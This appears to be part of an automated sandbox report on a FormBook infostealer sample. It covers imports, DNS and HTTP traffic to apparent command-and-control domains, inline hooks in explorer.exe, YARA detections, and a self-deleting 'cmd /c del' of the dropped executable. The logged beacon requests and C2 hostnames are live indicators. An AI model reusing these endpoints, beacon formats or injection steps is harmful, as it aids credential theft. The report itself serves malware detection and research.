                    GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                    KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, CreateFileW, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                    Possible Origin

                    Language of compilation systemCountry where language is spokenMap
                    EnglishUnited States

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    May 13, 2022 19:44:48.145380020 CEST4980980192.168.2.5170.75.150.177
                    May 13, 2022 19:44:48.256453037 CEST8049809170.75.150.177192.168.2.5
                    May 13, 2022 19:44:48.276657104 CEST4980980192.168.2.5170.75.150.177
                    May 13, 2022 19:44:48.311563969 CEST4980980192.168.2.5170.75.150.177
                    May 13, 2022 19:44:48.424303055 CEST8049809170.75.150.177192.168.2.5
                    May 13, 2022 19:44:48.424365044 CEST8049809170.75.150.177192.168.2.5
                    May 13, 2022 19:44:48.440042973 CEST4980980192.168.2.5170.75.150.177
                    May 13, 2022 19:44:48.791579008 CEST4980980192.168.2.5170.75.150.177
                    May 13, 2022 19:44:48.903620005 CEST8049809170.75.150.177192.168.2.5
                    May 13, 2022 19:45:29.052391052 CEST4987180192.168.2.535.186.238.101
                    May 13, 2022 19:45:29.071583986 CEST804987135.186.238.101192.168.2.5
                    May 13, 2022 19:45:29.071784973 CEST4987180192.168.2.535.186.238.101
                    May 13, 2022 19:45:29.073164940 CEST4987180192.168.2.535.186.238.101
                    May 13, 2022 19:45:29.092152119 CEST804987135.186.238.101192.168.2.5
                    May 13, 2022 19:45:29.187019110 CEST804987135.186.238.101192.168.2.5
                    May 13, 2022 19:45:29.187047958 CEST804987135.186.238.101192.168.2.5
                    May 13, 2022 19:45:29.187232971 CEST4987180192.168.2.535.186.238.101
                    May 13, 2022 19:45:29.187288046 CEST4987180192.168.2.535.186.238.101
                    May 13, 2022 19:45:29.496124029 CEST4987180192.168.2.535.186.238.101
                    May 13, 2022 19:45:29.513092995 CEST804987135.186.238.101192.168.2.5

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    May 13, 2022 19:44:47.921972036 CEST4940753192.168.2.58.8.8.8
                    May 13, 2022 19:44:48.093338013 CEST53494078.8.8.8192.168.2.5
                    May 13, 2022 19:45:07.338747978 CEST5993353192.168.2.58.8.8.8
                    May 13, 2022 19:45:08.341361046 CEST5993353192.168.2.58.8.8.8
                    May 13, 2022 19:45:08.829252958 CEST53599338.8.8.8192.168.2.5
                    May 13, 2022 19:45:09.802239895 CEST53599338.8.8.8192.168.2.5
                    May 13, 2022 19:45:29.028887987 CEST5082953192.168.2.58.8.8.8
                    May 13, 2022 19:45:29.050872087 CEST53508298.8.8.8192.168.2.5

                    ICMP Packets

                    TimestampSource IPDest IPChecksumCodeType
                    May 13, 2022 19:45:09.802361965 CEST192.168.2.58.8.8.8cff3(Port unreachable)Destination Unreachable

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    May 13, 2022 19:44:47.921972036 CEST192.168.2.58.8.8.80xa865Standard query (0)www.qzbozhijy.comA (IP address)IN (0x0001)
                    May 13, 2022 19:45:07.338747978 CEST192.168.2.58.8.8.80xe307Standard query (0)www.lume24.comA (IP address)IN (0x0001)
                    May 13, 2022 19:45:08.341361046 CEST192.168.2.58.8.8.80xe307Standard query (0)www.lume24.comA (IP address)IN (0x0001)
                    May 13, 2022 19:45:29.028887987 CEST192.168.2.58.8.8.80x3c1fStandard query (0)www.cryptocurrenciesmarketcaps.comA (IP address)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    May 13, 2022 19:44:48.093338013 CEST8.8.8.8192.168.2.50xa865No error (0)www.qzbozhijy.com170.75.150.177A (IP address)IN (0x0001)
                    May 13, 2022 19:45:08.829252958 CEST8.8.8.8192.168.2.50xe307Server failure (2)www.lume24.comnonenoneA (IP address)IN (0x0001)
                    May 13, 2022 19:45:09.802239895 CEST8.8.8.8192.168.2.50xe307Server failure (2)www.lume24.comnonenoneA (IP address)IN (0x0001)
                    May 13, 2022 19:45:29.050872087 CEST8.8.8.8192.168.2.50x3c1fNo error (0)www.cryptocurrenciesmarketcaps.com35.186.238.101A (IP address)IN (0x0001)

                    HTTP Request Dependency Graph

                    • www.qzbozhijy.com
                    • www.cryptocurrenciesmarketcaps.com

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.549809170.75.150.17780C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    May 13, 2022 19:44:48.311563969 CEST9033OUTGET /m9y5/?GDHDO=orMzR/RfXnMhfSAyBjBjnR1lGR+TvkHzuwdFBkAhJBLh1eKTDfMMMN4zoKLE4Jh6elIQ&2d0tk4=7nxxAXLHM4 HTTP/1.1
                    Host: www.qzbozhijy.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    May 13, 2022 19:44:48.424303055 CEST9034INHTTP/1.1 200 OK
                    Server: nginx
                    Date: Fri, 13 May 2022 17:44:48 GMT
                    Content-Type: text/html
                    Content-Length: 785
                    Connection: close
                    Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e c6 bc cf e7 ca d8 b6 d9 bb f5 d4 cb b4 fa c0 ed d3 d0 cf de b9 ab cb be 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0d 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0d 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 65 6c 73 65 20 7b 0d 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0d 0a 20 20 20 20 7d 0d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0d 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0d 0a 7d 29 28 29 3b 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 63 6f 6d 6d 6f 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 74 6a 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script></head><script language="javascript" type="text/javascript" src="/common.js"></script><script language="javascript" type="text/javascript" src="/tj.js"></script></body></html>


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.54987135.186.238.10180C:\Windows\explorer.exe
                    TimestampkBytes transferredDirectionData
                    May 13, 2022 19:45:29.073164940 CEST10125OUTGET /m9y5/?GDHDO=nj3oxEIT1zdIdiXK9EykkBiMkkzJg0Of7VGGA4YdAoGVUT4DfIqyC+XPG7GpV3gppNhE&2d0tk4=7nxxAXLHM4 HTTP/1.1
                    Host: www.cryptocurrenciesmarketcaps.com
                    Connection: close
                    Data Raw: 00 00 00 00 00 00 00
                    Data Ascii:
                    May 13, 2022 19:45:29.187019110 CEST10125INHTTP/1.1 403 Forbidden
                    Server: openresty
                    Date: Fri, 13 May 2022 17:45:29 GMT
                    Content-Type: text/html
                    Content-Length: 291
                    ETag: "627e693c-123"
                    Via: 1.1 google
                    Connection: close
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                    Code Manipulations

                    User Modules

                    Hook Summary

                    Function NameHook TypeActive in Processes
                    PeekMessageAINLINEexplorer.exe
                    PeekMessageWINLINEexplorer.exe
                    GetMessageWINLINEexplorer.exe
                    GetMessageAINLINEexplorer.exe

                    Processes

                    Process: explorer.exe, Module: user32.dll
                    Function NameHook TypeNew Data
                    PeekMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xEE
                    PeekMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xEE
                    GetMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xEE
                    GetMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xEE

                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:19:43:24
                    Start date:13/05/2022
                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.72878.10638.exe"
                    Imagebase:0x400000
                    File size:277920 bytes
                    MD5 hash:69250F55FBFE48822C838B4EEAF33A0A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low

                    General

                    Target ID:1
                    Start time:19:43:26
                    Start date:13/05/2022
                    Path:C:\Users\user\AppData\Local\Temp\fdvucso.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
                    Imagebase:0x1190000
                    File size:80384 bytes
                    MD5 hash:8CA00DF697FFA200C6CA558754C49F37
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.440039728.0000000000A70000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    General

                    Target ID:2
                    Start time:19:43:27
                    Start date:13/05/2022
                    Path:C:\Users\user\AppData\Local\Temp\fdvucso.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Users\user\AppData\Local\Temp\fdvucso.exe C:\Users\user\AppData\Local\Temp\wqqynoeqp
                    Imagebase:0x1190000
                    File size:80384 bytes
                    MD5 hash:8CA00DF697FFA200C6CA558754C49F37
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.436409540.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.514455300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.514455300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.514455300.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.514680084.0000000001130000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.514680084.0000000001130000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.514680084.0000000001130000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.514627595.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.514627595.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.514627595.0000000000FF0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.438220489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.438220489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.438220489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:low

                    General

                    Target ID:5
                    Start time:19:43:33
                    Start date:13/05/2022
                    Path:C:\Windows\explorer.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\Explorer.EXE
                    Imagebase:0x7ff74fc70000
                    File size:3933184 bytes
                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.495589991.000000000B525000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.495589991.000000000B525000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.495589991.000000000B525000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.479898267.000000000B525000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.479898267.000000000B525000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.479898267.000000000B525000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:high

                    General

                    Target ID:13
                    Start time:19:44:02
                    Start date:13/05/2022
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:C:\Windows\SysWOW64\cmd.exe
                    Imagebase:0x1100000
                    File size:232960 bytes
                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.693621783.0000000000550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.693621783.0000000000550000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.693621783.0000000000550000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.693742104.0000000000580000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.693742104.0000000000580000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.693742104.0000000000580000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000D.00000002.693389419.0000000000160000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000D.00000002.693389419.0000000000160000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000D.00000002.693389419.0000000000160000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                    Reputation:high

                    General

                    Target ID:15
                    Start time:19:44:07
                    Start date:13/05/2022
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:/c del "C:\Users\user\AppData\Local\Temp\fdvucso.exe"
                    Imagebase:0x1100000
                    File size:232960 bytes
                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Target ID:16
                    Start time:19:44:08
                    Start date:13/05/2022
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff77f440000
                    File size:625664 bytes
                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    No disassembly